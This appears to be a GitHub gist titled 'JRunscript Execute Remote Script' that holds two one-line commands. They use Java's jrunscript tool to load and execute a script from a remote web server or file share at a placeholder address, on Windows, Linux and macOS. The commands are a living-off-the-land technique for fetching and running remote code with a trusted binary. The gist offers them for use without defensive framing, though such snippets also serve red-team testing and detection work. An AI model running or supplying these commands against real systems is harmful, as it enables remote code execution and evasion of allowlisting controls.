Skip to content

Instantly share code, notes, and snippets.

@h4wkst3r
Last active June 21, 2018 01:17
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save h4wkst3r/fb79d4bac99b459f061a530feee60a74 to your computer and use it in GitHub Desktop.
Save h4wkst3r/fb79d4bac99b459f061a530feee60a74 to your computer and use it in GitHub Desktop.
JRunscript Execute Remote Script
//Windows, Linux & macOS - Script Hosted on Web Server
jrunscript -e "load('http://x.x.x.x/test.js')"
//Windows, Linux & macOS - Script Hosted on File Share
jrunscript –e "load('\\\\x.x.x.x\\folder\\file.blah')"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment